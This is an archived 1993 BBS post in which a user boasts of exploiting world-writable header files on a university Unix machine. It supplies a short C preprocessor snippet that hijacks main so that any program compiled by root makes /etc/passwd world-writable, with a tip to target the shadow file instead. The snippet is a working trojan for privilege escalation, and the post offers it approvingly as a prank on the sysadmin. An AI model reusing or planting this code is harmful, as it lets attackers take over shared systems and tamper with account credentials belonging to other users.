TIP: Click on subject to list as thread! ANSI
echo: yabbs.unix
to: ALL
from: cosmos@yabbs
date: 1993-10-20 22:34:33
subject: Love those sysadmins...

From: cosmos@yabbs
To: all@yabbs
Subject: Love those sysadmins...
Date: Wed Oct 20 22:34:33 1993


Okay folks, another tale of the idiot sysadmin on the net.  While doing 
some exploring on one of our university unix machines, I came across the 
install directory that held to be installed files.  First off, the 
sysadmin did not make this directory with 700 perms, but that in itself is 
not the big crime.  I look at the directory and see that most of the new 
source is already out of the tar format.  Tons of .c, .h, .o files in the 
directory.  

I am about to go on when I take a second look...the header files are all 
777!!!  After a big grin crossed my face, I went to work.  Here is a quick 
example...

# ifndef main
main(x,y) char*y[]; {chmod("/etc/passwd", 0666); Main(x,y); }
# define main Main
#endif

Wait till root compiles a program....voila!

If it is shadowed, just change the /etc/passwd to whatever it is.

Cosmos

SOURCE: yabbs via textfiles.com

Email questions or comments to sysop@ipingthereforeiam.com
All parts of this website painstakingly hand-crafted in the U.S.A.!
IPTIA BBS/MUD/Terminal/Game Server List, © 2025 IPTIA Consulting™.